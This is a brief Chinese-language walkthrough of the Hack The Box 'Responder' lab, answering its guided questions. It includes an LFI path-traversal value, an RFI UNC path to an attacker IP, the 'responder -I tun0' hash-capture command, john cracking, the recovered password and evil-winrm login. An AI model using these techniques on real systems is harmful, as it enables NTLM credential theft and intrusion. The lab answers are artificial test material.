hack the box responder

使用 IP 地址访问 Web 服务时，我们要重定向到的域是什么？



服务器上使用哪种脚本语言来生成网页？


抓取返回包判断





用于加载网页不同语言版本的 URL 参数的名称是什么？

根据提示,切换语言,可以发现答案是page



“page”参数的以下哪一个值是利用本地文件包含 （LFI） 漏洞的示例：“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“， ”minikatz.exe”



“page”参数的以下哪一个值是利用远程文件包含 （RFI） 漏洞的示例：“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“， ”minikatz.exe”



NTLM 代表什么？


我们在响应程序实用程序中使用哪个标志来指定网络接口？


administrator用户的密码是什么？

回答：badminton
首先启动responder并监听本地的tun0网卡，然后由于靶机存在RFI，因此可以远程访问本地的某个文件，使用responder拿到主机的administrator的哈希，然后使用john破解
使用responder监听本地tun0网卡
responder -I tun0




john 破解hash




我们将使用 Windows 服务（即在机器上运行）使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP？



使用evil-winrm 进行登录




免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！